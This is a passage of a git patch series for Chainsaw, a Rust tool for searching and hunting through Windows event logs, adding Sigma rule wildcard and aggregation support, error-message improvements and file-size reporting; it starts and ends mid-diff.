mut identifiers = detection.identifiers; - for (k, v) in d.identifiers { - match identifiers.remove(&k) { - Some(i) => match (i, v) { - (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { - for (x, y) in v { - m.insert(x, y); + let mut index = 0; + let mut mutated = vec![]; + let mut parts = condition.split_whitespace(); + while let Some(part) = parts.next() { + let part = if let Some(part) = part.strip_prefix("(") { + mutated.push("(".to_owned()); + part + } else { + part + }; + match part { + "all" | "1" => { + if let Some(next) = parts.next() { + if next != "of" { + mutated.push(part.to_owned()); + mutated.push(next.to_owned()); + continue; + } + + if let Some(ident) = parts.next() { + let mut bracket = false; + let ident = if let Some(ident) = ident.strip_suffix(")") { + bracket = true; + ident + } else { + ident + }; + if let Some(ident) = ident.strip_suffix("*") { + let mut scratch = vec![]; + let mut keys = vec![]; + for (k, _) in &identifiers { + if let Yaml::String(key) = k { + if key.starts_with(ident) { + keys.push(k.clone()); + } + } + } + for key in keys { + if let Some(v) = identifiers.get(&key) { + scratch.push(v.clone()); + } + } + if scratch.is_empty() { + anyhow::bail!("could not find any applicable identifiers"); + } + let key = format!("tau_{}", index); + if part == "all" { + mutated.push(format!("all({})", key)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", key)); + } + identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); + mutated.push(")".to_owned()); + index += 1; + continue; + } else { + if part == "all" { + mutated.push(format!("all({})", ident)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", ident)); + } + mutated.push(")".to_owned()); + continue; + } } - identifiers.insert(k, Yaml::Mapping(m)); } - (Yaml::Sequence(s), Yaml::Mapping(v)) => { - let mut z = vec![]; - for mut ss in s.into_iter() { - if let Some(m) = ss.as_mapping_mut() { - for (x, y) in v.clone() { - m.insert(x, y); + } + _ => {} + } + mutated.push(part.to_owned()); + } + let condition = mutated.join(" "); + if let Some(d) = extra { + for (k, v) in d.identifiers { + match identifiers.remove(&k) { + Some(i) => match (i, v) { + (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { + for (x, y) in v { + m.insert(x, y); + } + identifiers.insert(k, Yaml::Mapping(m)); + } + (Yaml::Sequence(s), Yaml::Mapping(v)) => { + let mut z = vec![]; + for mut ss in s.into_iter() { + if let Some(m) = ss.as_mapping_mut() { + for (x, y) in v.clone() { + m.insert(x, y); + } } + z.push(ss); } - z.push(ss); + identifiers.insert(k, Yaml::Sequence(z)); } - identifiers.insert(k, Yaml::Sequence(z)); + (_, _) => anyhow::bail!("unsupported rule collection format"), + }, + None => { + identifiers.insert(k, v); } - (_, _) => anyhow::bail!("unsupported rule collection format"), - }, - None => { - identifiers.insert(k, v); } } } detection = Detection { - condition, + condition: Some(Yaml::String(condition)), identifiers, } } From e0a7d09e619def84c95c7a947fe0668b61736f9d Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 09:57:52 +0100 Subject: [PATCH 23/77] feat(sigma): support nested wildcards Chainsaw will now convert nested wildcard logic into regex so that is can be used by tau. --- src/rule/sigma.rs | 49 ++++++++++++++++++++++++++++++++++++++--------- 1 file changed, 40 insertions(+), 9 deletions(-) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 26422967..943c8489 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -99,7 +99,7 @@ trait Match { fn as_contains(&self) -> String; fn as_endswith(&self) -> String; fn as_match(&self) -> Option; - fn as_regex(&self) -> Option; + fn as_regex(&self, convert: bool) -> Option; fn as_startswith(&self) -> String; } @@ -128,9 +128,32 @@ impl Match for String { } Some(format!("i{}", self)) } - fn as_regex(&self) -> Option { - let _ = Regex::new(self).ok()?; - Some(format!("?{}", self)) + fn as_regex(&self, convert: bool) -> Option { + if convert { + let literal = regex::escape(self); + let mut scratch = Vec::with_capacity(literal.len()); + let mut escaped = false; + for c in literal.chars() { + match c { + '*' | '?' => { + if !escaped { + scratch.push('.'); + } + } + '\\' => { + escaped = !escaped; + } + _ => { + escaped = false; + } + } + scratch.push(c); + } + Some(format!("?{}", scratch.into_iter().collect::())) + } else { + let _ = Regex::new(self).ok()?; + Some(format!("?{}", self)) + } } fn as_startswith(&self) -> String { format!("i{}*", self) @@ -159,7 +182,7 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { } else if modifiers.contains("endswith") { Yaml::String(s.as_endswith()) } else if modifiers.contains("re") { - let r = match s.as_regex() { + let r = match s.as_regex(false) { Some(r) => r, None => { return Err(anyhow!(s.to_owned()).context("unsupported regex")); @@ -172,7 +195,11 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { let s = match s.as_match() { Some(s) => s, None => { - return Err(anyhow!(s.to_owned()).context("unsupported match")); + if let Some(r) = s.as_regex(true) { + r + } else { + return Err(anyhow!(s.to_owned()).context("unsupported match")); + } } }; Yaml::String(s) @@ -292,7 +319,9 @@ fn prepare(detection: Detection, extra: Option) -> Result mutated.push(format!("of({}, 1)", key)); } identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); - mutated.push(")".to_owned()); + if bracket { + mutated.push(")".to_owned()); + } index += 1; continue; } else { @@ -301,7 +330,9 @@ fn prepare(detection: Detection, extra: Option) -> Result } else if part == "1" { mutated.push(format!("of({}, 1)", ident)); } - mutated.push(")".to_owned()); + if bracket { + mutated.push(")".to_owned()); + } continue; } } @@ -607,7 +638,7 @@ mod tests { #[test] fn test_match_regex() { let x = "foobar".to_owned(); - assert_eq!(x.as_regex().unwrap(), "?foobar"); + assert_eq!(x.as_regex(false).unwrap(), "?foobar"); } #[test] From bc3779a5e6921daba08de00dc517f081c462308b Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 11:37:25 +0100 Subject: [PATCH 24/77] feat(hunt): add initial support for sigma aggregations --- mappings/sigma-event-logs.yml | 3 ++ src/cli.rs | 1 + src/hunt.rs | 54 ++++++++++++++++---- src/rule/mod.rs | 5 +- src/rule/sigma.rs | 93 ++++++++++++++++++++++++++++++++--- 5 files changed, 138 insertions(+), 18 deletions(-) diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 2e9acbcd..2cf419bd 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -265,6 +265,9 @@ groups: - name: User from: UserName to: Event.EventData.SubjectUserName + - name: Name + from: TaskName + to: Event.EventData.TaskName # TODO: Can someone check if this is a typo...? - name: Command Line from: CommandLine diff --git a/src/cli.rs b/src/cli.rs index 0c678510..75a6e709 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -121,6 +121,7 @@ pub fn print_detections( .entry(&hunt.group) .or_insert((vec![], HashSet::new())); // NOTE: We only support count in aggs atm so we can inject that value in...! + // NOTE: This will not work for sigma based aggs... if hunt.is_aggregation() { (*headers).0.push("count".to_owned()); (*headers).1.insert("count".to_owned()); diff --git a/src/hunt.rs b/src/hunt.rs index ab28ae03..c2a5cd07 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -374,7 +374,8 @@ impl Hunter { let kind = reader.kind(); // This can be optimised better ;) let mut detections = vec![]; - let mut aggregates: HashMap>)> = HashMap::new(); + let mut aggregates: HashMap<(Uuid, Uuid), (&Aggregate, HashMap>)> = + HashMap::new(); let mut files: HashMap = HashMap::new(); for document in reader.documents() { let document_id = Uuid::new_v4(); @@ -453,11 +454,37 @@ impl Hunter { } }; if hit { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); + if let Some(aggregate) = &rule.aggregate { + files + .insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; + } + } + if skip { + continue; + } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + .or_insert((aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); + } } } } @@ -474,16 +501,23 @@ impl Hunter { if let Some(aggregate) = aggregate { files.insert(document_id, (document.clone(), timestamp)); let mut hasher = DefaultHasher::new(); + let mut skip = false; for field in &aggregate.fields { if let Some(value) = mapped.find(field).and_then(|s| s.to_string()) { value.hash(&mut hasher); + } else { + skip = true; + break; } } + if skip { + continue; + } let id = hasher.finish(); let aggregates = aggregates - .entry(hunt.id) + .entry((hunt.id, hunt.id)) .or_insert((aggregate, HashMap::new())); let docs = aggregates.1.entry(id).or_insert(vec![]); docs.push(document_id); @@ -515,7 +549,7 @@ impl Hunter { }); } } - for (id, (aggregate, docs)) in aggregates { + for ((hid, rid), (aggregate, docs)) in aggregates { for ids in docs.values() { let hit = match aggregate.count { Pattern::Equal(i) => ids.len() == (i as usize), @@ -544,8 +578,8 @@ impl Hunter { timestamps.sort(); detections.push(Detections { hits: vec![Hit { - hunt: id, - rule: id, + hunt: hid, + rule: rid, timestamp: timestamps .into_iter() .next() diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 3819b4e9..377492e0 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -105,7 +105,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), - aggregate: None, + aggregate: rule.aggregate.map(|a| chainsaw::Aggregate { + count: a.count, + fields: a.fields, + }), }, kind: Kind::Sigma, }) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 943c8489..c51ee736 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -5,7 +5,7 @@ use std::path::Path; use anyhow::Result; use regex::Regex; -use serde::Deserialize; +use serde::{Deserialize, Serialize}; use serde_yaml::{Mapping, Sequence, Value as Yaml}; use tau_engine::Rule as Tau; @@ -17,12 +17,21 @@ pub struct Rule { #[serde(flatten)] pub tau: Tau, + #[serde(default)] + pub aggregate: Option, + pub authors: Vec, pub description: String, pub level: Option, pub status: Option, } +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct Aggregate { + pub count: String, + pub fields: Vec, +} + #[derive(Clone, Debug, Deserialize, PartialEq)] struct Detection { #[serde(default)] @@ -91,7 +100,14 @@ trait Condition { impl Condition for String { fn unsupported(&self) -> bool { - self.contains('|') | self.contains('*') | self.contains(" of ") + self.contains(" | ") + | self.contains('*') + | self.contains(" avg ") + | self.contains(" of ") + | self.contains(" max ") + | self.contains(" min ") + | self.contains(" near ") + | self.contains(" sum ") } } @@ -210,7 +226,11 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { Ok(v) } -fn prepare(detection: Detection, extra: Option) -> Result { +fn prepare( + detection: Detection, + extra: Option, +) -> Result<(Detection, Option)> { + let mut aggregate = None; let mut detection = detection; let condition = extra .as_ref() @@ -266,6 +286,57 @@ fn prepare(detection: Detection, extra: Option) -> Result } _ => anyhow::bail!("condition must be a string"), }; + let condition = if condition.contains(" | ") { + let (condition, agg) = condition + .split_once(" | ") + .expect("could not split condition"); + let mut parts = agg.split_whitespace(); + let mut fields = vec![]; + // NOTE: We only support count atm... + // agg-function(agg-field) [ by group-field ] comparison-op value + if let Some(kind) = parts.next() { + if let Some(rest) = kind.strip_prefix("count(") { + if let Some(field) = rest.strip_suffix(")") { + if !field.is_empty() { + fields.push(field.to_owned()); + } + } else { + anyhow::bail!("invalid agg function"); + } + } else { + anyhow::bail!("unsupported agg function - {}", kind); + } + } else { + anyhow::bail!("missing agg function"); + } + let mut part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + if part == "by" { + let field = match parts.next() { + Some(field) => field, + None => anyhow::bail!("missing group field"), + }; + fields.push(field.to_owned()); + part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + } + let number = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + aggregate = Some(Aggregate { + count: format!("{}{}", part, number), + fields, + }); + condition + } else { + condition + }; + let mut identifiers = detection.identifiers; let mut index = 0; let mut mutated = vec![]; @@ -379,7 +450,7 @@ fn prepare(detection: Detection, extra: Option) -> Result } } } - Ok(detection) + Ok((detection, aggregate)) } fn detections_to_tau(detection: Detection) -> Result { @@ -433,7 +504,9 @@ fn detections_to_tau(detection: Detection) -> Result { None => bail!("identifiers must be strings"), }; if k == "timeframe" { - bail!("timeframe based rules cannot be converted"); + // TODO: Ignore for now as this would make the aggregator more complex... + continue; + //bail!("timeframe based rules cannot be converted"); } let mut multi = false; let blocks = match v { @@ -547,7 +620,7 @@ pub fn load(rule: &Path) -> Result> { if main.header.and_then(|m| m.action).is_some() { for sigma in sigma.into_iter() { if let Some(extension) = sigma.detection { - let detection = match &main.detection { + let (detection, agg) = match &main.detection { Some(d) => prepare(d.clone(), Some(extension)), None => prepare(extension, None), }?; @@ -559,6 +632,9 @@ pub fn load(rule: &Path) -> Result> { for (k, v) in tau { rule.insert(k, v); } + if let Some(agg) = agg.and_then(|a| serde_yaml::to_value(a).ok()) { + rule.insert(Yaml::String("aggregate".to_owned()), agg); + } rules.push(rule.into()); } else { single = true; @@ -571,7 +647,7 @@ pub fn load(rule: &Path) -> Result> { if single { let mut rule = base; if let Some(detection) = main.detection { - let detection = prepare(detection, None)?; + let (detection, agg) = prepare(detection, None)?; let tau = detections_to_tau(detection)?; if let Some(level) = main.level { rule.insert("level".into(), level.into()); @@ -579,6 +655,9 @@ pub fn load(rule: &Path) -> Result> { for (k, v) in tau { rule.insert(k, v); } + if let Some(agg) = agg.and_then(|a| serde_yaml::to_value(a).ok()) { + rule.insert(Yaml::String("aggregate".to_owned()), agg); + } rules.push(rule.into()); } } From 56f06d43f228f67c3fbb8c7d7dee25a5f8c5da9c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 11:38:24 +0100 Subject: [PATCH 25/77] build: bump to v2.0.0-alpha.4 --- Cargo.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 83623c75..fd5be64f 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.3" +version = "2.0.0-alpha.4" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From b465affc574d743d1ee92a390b8f5d1e013faadd Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 18:13:48 +0100 Subject: [PATCH 26/77] various fixes --- src/cli.rs | 12 +++++++++++- src/main.rs | 21 +++++++++++++++++---- src/rule/mod.rs | 11 ++++++++++- 3 files changed, 38 insertions(+), 6 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 0c678510..776e5ee4 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -75,6 +75,14 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +fn format_time(event_time: String) -> String { + let chunks = event_time.rsplit('.').last(); + match chunks { + Some(e) => e.replace("T", " ").replace('"', ""), + None => event_time, + } +} + pub struct Grouping<'a> { hits: Vec>, kind: &'a Kind, @@ -183,7 +191,7 @@ pub fn print_detections( table.add_row(Row::new(cells)); for grouping in group { - let localised = if let Some(timezone) = timezone { + let mut localised = if let Some(timezone) = timezone { timezone .from_local_datetime(grouping.timestamp) .single() @@ -198,6 +206,8 @@ pub fn print_detections( DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; + localised = format_time(localised); + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some // corners here! let count; diff --git a/src/main.rs b/src/main.rs index decb8087..a1398bfd 100644 --- a/src/main.rs +++ b/src/main.rs @@ -40,7 +40,7 @@ enum Command { #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, /// Additional rules to hunt with. - #[structopt(short = "r", long = "rule", number_of_values = 1, requires("mapping"))] + #[structopt(short = "r", long = "rule", number_of_values = 1)] rule: Option>, /// Set the column width for the tabular output. @@ -236,23 +236,35 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; - cs_eprintln!("[+] Loading rules..."); + cs_eprintln!("[+] Loading detection rules from: {:?}", rules); let mut failed = 0; let mut count = 0; let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file) { + match load_rule(&file, &mapping.is_some()) { Ok(mut r) => { count += 1; rs.append(&mut r) } - Err(_) => { + Err(e) => { + // Hacky way of exposing rule types from load_rule function + if e.to_string() == "sigma-no-mapping" { + return Err(anyhow::anyhow!( + "No mapping file specified for provided Sigma rules, specify one with the '-m' flag", + )); + } failed += 1; } } } } + cs_eprintln!("[+] Loading event logs from: {:?}", path); + if count == 0 { + return Err(anyhow::anyhow!( + "No valid detection rules were found in the provided paths", + )); + } if failed > 0 { cs_eprintln!( "[+] Loaded {} detection rules ({} were not loaded)", @@ -262,6 +274,7 @@ fn run() -> Result<()> { } else { cs_eprintln!("[+] Loaded {} detection rules", count); } + let rules = rs; let mut hunter = Hunter::builder() .rules(rules) diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 2afbb2f8..b594f68b 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -47,12 +47,13 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &Path) -> crate::Result> { +pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } + // This is a bit crude but we try all formats then report the errors... let rules = if let Ok(rule) = chainsaw::load(path) { vec![Rule { @@ -60,6 +61,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { kind: Kind::Chainsaw, }] } else if let Ok(rules) = sigma::load(path) { + if !mapping { + // Hacky way of exposing rule types from load_rule function + anyhow::bail!("sigma-no-mapping"); + } rules .into_iter() .filter_map(|r| serde_yaml::from_value(r).ok()) @@ -132,6 +137,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { } else { anyhow::bail!("failed to load rule, run the linter for more information"); }; + + if rules.len() == 0 { + anyhow::bail!("No valid rules could be loaded from the file"); + } Ok(rules) } From 01deb40958bde66e9179fe3888a8ec31c5b0095c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 18:29:51 +0100 Subject: [PATCH 27/77] split detection name if long --- src/cli.rs | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 776e5ee4..1e3f43cb 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -75,6 +75,21 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +fn split_tag(tag_name: &str) -> String { + let mut count = 0; + let mut chars = Vec::with_capacity(tag_name.len()); + for char in tag_name.chars() { + count += 1; + if count > 20 && char.is_whitespace() { + count = 0; + chars.push('\n'); + } else { + chars.push(char); + } + } + chars.into_iter().collect() +} + fn format_time(event_time: String) -> String { let chunks = event_time.rsplit('.').last(); match chunks { @@ -304,7 +319,7 @@ pub fn print_detections( ])); for rule in &rules { table.add_row(Row::new(vec![ - cell!(rule.name), + cell!(split_tag(&rule.name)), cell!(rule.authors.join("\n")), cell!(rule.level), cell!(rule.status), @@ -314,7 +329,7 @@ pub fn print_detections( } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, rule.name)) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name))) .collect::>() .join("\n"))); } From efac8696324ab35c02fb84314b918dc747928953 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 20:44:55 +0100 Subject: [PATCH 28/77] add total evtx files loaded message --- src/main.rs | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index a1398bfd..6ee8913b 100644 --- a/src/main.rs +++ b/src/main.rs @@ -236,6 +236,7 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; + cs_eprintln!("[+] Loading event logs from: {:?}", path); cs_eprintln!("[+] Loading detection rules from: {:?}", rules); let mut failed = 0; let mut count = 0; @@ -259,7 +260,6 @@ fn run() -> Result<()> { } } } - cs_eprintln!("[+] Loading event logs from: {:?}", path); if count == 0 { return Err(anyhow::anyhow!( "No valid detection rules were found in the provided paths", @@ -300,6 +300,8 @@ fn run() -> Result<()> { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); + } else { + cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); From 35dd50cfbd2709819b54d0c37383564637d472ba Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:05:48 +0100 Subject: [PATCH 29/77] handle error where mapping file does not exist --- src/hunt.rs | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/hunt.rs b/src/hunt.rs index ab28ae03..c40c4efc 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -120,7 +120,10 @@ impl HunterBuilder { if let Some(mut mappings) = self.mappings { mappings.sort(); for mapping in mappings { - let mut file = fs::File::open(mapping)?; + let mut file = match fs::File::open(mapping) { + Ok(a) => a, + Err(e) => anyhow::bail!("Error loading mapping file - {}", e), + }; let mut content = String::new(); file.read_to_string(&mut content)?; let mut mapping: Mapping = serde_yaml::from_str(&content)?; From 5f0748502ab364c13bcfd70133098d509430bc2f Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:10:31 +0100 Subject: [PATCH 30/77] handle error where mapping file is not valid --- src/hunt.rs | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index c40c4efc..73f8eea4 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -122,11 +122,14 @@ impl HunterBuilder { for mapping in mappings { let mut file = match fs::File::open(mapping) { Ok(a) => a, - Err(e) => anyhow::bail!("Error loading mapping file - {}", e), + Err(e) => anyhow::bail!("Error loading specified mapping file - {}", e), }; let mut content = String::new(); file.read_to_string(&mut content)?; - let mut mapping: Mapping = serde_yaml::from_str(&content)?; + let mut mapping: Mapping = match serde_yaml::from_str(&content) { + Ok(a) => a, + Err(e) => anyhow::bail!("Provided mapping file is invalid - {}", e), + }; mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); for group in mapping.groups { let mapper = Mapper::from(group.fields); From 4543b73c99d6f72bd5c5c227ec6935e67ca418e4 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:23:30 +0100 Subject: [PATCH 31/77] add total evtx files loaded message to search --- src/main.rs | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index 6ee8913b..a6c343da 100644 --- a/src/main.rs +++ b/src/main.rs @@ -400,8 +400,10 @@ fn run() -> Result<()> { } if files.len() == 0 { return Err(anyhow::anyhow!( - "No event logs were found in the provided paths" + "No event logs were found in the provided paths", )); + } else { + cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) From cc9bc3bcd13dcf57e64a526331f27b4e51097773 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:30:40 +0100 Subject: [PATCH 32/77] add error message when EVTX path is invalid --- src/file/mod.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index c05621e2..c0245a60 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -213,7 +213,7 @@ pub fn get_files( files.push(path.to_path_buf()); } } else { - anyhow::bail!("Invalid input path: {}", path.display()); + anyhow::bail!("Specified event log path is invalid - {}", path.display()); } Ok(files) } From 4781c6202edde3d41e543887e0208adf469c642a Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 23:27:19 +0100 Subject: [PATCH 33/77] adding output message to state total size of loaded ETVX files --- Cargo.toml | 1 + src/main.rs | 24 +++++++++++++++++++----- 2 files changed, 20 insertions(+), 5 deletions(-) diff --git a/Cargo.toml b/Cargo.toml index 83623c75..1d420bdc 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -12,6 +12,7 @@ edition = "2021" [dependencies] aho-corasick = "0.7" anyhow = "1.0" +bytesize = "1.0" chrono = "0.4" chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" diff --git a/src/main.rs b/src/main.rs index a6c343da..d9dd221f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,12 +1,15 @@ #[macro_use] extern crate chainsaw; +extern crate bytesize; use std::fs::File; use std::path::PathBuf; use anyhow::Result; +use bytesize::ByteSize; use chrono::NaiveDateTime; use chrono_tz::Tz; + use structopt::StructOpt; use chainsaw::{ @@ -267,7 +270,7 @@ fn run() -> Result<()> { } if failed > 0 { cs_eprintln!( - "[+] Loaded {} detection rules ({} were not loaded)", + "[+] Loaded {} detection rules ({} not loaded)", count, failed ); @@ -293,15 +296,20 @@ fn run() -> Result<()> { } let hunter = hunter.build()?; let mut files = vec![]; + let mut size = ByteSize::mb(0); for path in &path { - files.extend(get_files(path, &extension, skip_errors)?); + let res = get_files(path, &extension, skip_errors)?; + for i in &res { + size += i.metadata()?.len(); + } + files.extend(res); } if files.len() == 0 { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); } else { - cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); + cs_eprintln!("[+] Loaded {} EVTX files ({})", files.len(), size); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); @@ -395,15 +403,21 @@ fn run() -> Result<()> { ); } let mut files = vec![]; + let mut size = ByteSize::mb(0); for path in &paths { - files.extend(get_files(path, &extension, skip_errors)?); + let res = get_files(path, &extension, skip_errors)?; + for i in &res { + size += i.metadata()?.len(); + } + files.extend(res); } + if files.len() == 0 { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); } else { - cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); + cs_eprintln!("[+] Loaded {} EVTX files ({})", files.len(), size); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) From 0afe74409cef45c894470740fe40be63c0ae2d22 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 23:31:54 +0100 Subject: [PATCH 34/77] fix: clippy warnings --- src/cli.rs | 2 +- src/ext/tau.rs | 6 +++--- src/main.rs | 4 ++-- src/rule/mod.rs | 2 +- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 1e3f43cb..4c14fbf8 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -93,7 +93,7 @@ fn split_tag(tag_name: &str) -> String { fn format_time(event_time: String) -> String { let chunks = event_time.rsplit('.').last(); match chunks { - Some(e) => e.replace("T", " ").replace('"', ""), + Some(e) => e.replace('T', " ").replace('"', ""), None => event_time, } } diff --git a/src/ext/tau.rs b/src/ext/tau.rs index f98467ff..9dbd5a06 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -39,14 +39,14 @@ pub fn parse_kv(kv: &str) -> crate::Result { let value = parts.next().expect("invalid tau key value pair"); let mut cast = false; let mut not = false; - let (field, key) = if key.starts_with("int(") && key.ends_with(")") { + let (field, key) = if key.starts_with("int(") && key.ends_with(')') { let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Int), key) - } else if key.starts_with("not(") && key.ends_with(")") { + } else if key.starts_with("not(") && key.ends_with(')') { not = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Field(key.to_owned()), key) - } else if key.starts_with("str(") && key.ends_with(")") { + } else if key.starts_with("str(") && key.ends_with(')') { cast = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Str), key) diff --git a/src/main.rs b/src/main.rs index d9dd221f..53d95b77 100644 --- a/src/main.rs +++ b/src/main.rs @@ -304,7 +304,7 @@ fn run() -> Result<()> { } files.extend(res); } - if files.len() == 0 { + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); @@ -412,7 +412,7 @@ fn run() -> Result<()> { files.extend(res); } - if files.len() == 0 { + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); diff --git a/src/rule/mod.rs b/src/rule/mod.rs index b594f68b..358f6df1 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -138,7 +138,7 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { anyhow::bail!("failed to load rule, run the linter for more information"); }; - if rules.len() == 0 { + if rules.is_empty() { anyhow::bail!("No valid rules could be loaded from the file"); } Ok(rules) From e24031943221a87e367c9d9a2a1714b28e8282f6 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 21 Jun 2022 11:47:57 +0100 Subject: [PATCH 35/77] fix: sigma parsing was broken due to a misunderstanding This is a long standing bug where a condition that should be treated as an 'and' was treated as an 'or'. Along with other improvements this should now be fixed. --- Cargo.lock | 6 +- src/main.rs | 10 +- src/rule/mod.rs | 48 +-- src/rule/sigma.rs | 744 +++++++++++++++++++++++++--------------------- 4 files changed, 444 insertions(+), 364 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 507b9d06..69e397b1 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = 